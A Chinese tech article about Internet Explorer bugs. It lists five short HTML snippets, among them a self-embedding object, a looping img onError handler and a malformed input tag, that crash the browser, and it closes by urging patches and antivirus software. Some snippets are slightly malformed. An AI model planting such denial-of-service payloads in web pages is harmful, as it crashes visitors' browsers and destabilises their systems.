扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
微软产品素以Bug众多著称,其中Windows系统和IE浏览器更是Bug多多。对于IE浏览器,甚至简单的一行代码就能使它崩溃。所谓IE崩溃,就是所有的IE浏览器窗口关闭,乃至引起系统出错、死机等。在网页中嵌入以下几种代码就能引起IE崩溃。
<!-
此代码所在的文件名应为crash.htm
-->
<object data=″crash.htm″ type=″text/html″></object>
2.包含恶意image标签的html页面能导致系统进程的无限循环,从而引起IE崩溃。对Windows9X操作系统,还会引起系统不稳定:
<img src=″::″ onError=″this.src='::';″>
对于这个Bug微软已经提供了补丁,如果你的系统打了这个补丁的话,你会看到一个弹出警告窗口:
Stack overflow at linex(在某行栈溢出)。
3.包含恶意AVI Object的html页面能引起IE崩溃:
<object classid=″clsid00022613-0000-0000-C000-000000000046″></object>
4.一个包含特殊object对象内容的html页面将导致DoS攻击,引起IE崩溃:
<object data=″#″ type=″text/x-scriptlet″></object>
5.畸形的input标签导致IE崩溃:
<input type>
上面罗列的只是一些简单的代码,但能让IE崩溃的恶意代码又何止这些,IE的漏洞也不仅仅是崩溃,严重的漏洞能让心怀恶意者对用户的电脑为所欲为。IE作为绝大多数网民使用的浏览器,加强它的安全性势在必然,如及时打补丁、安装杀毒软件
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者
京公网安备 11010802021500号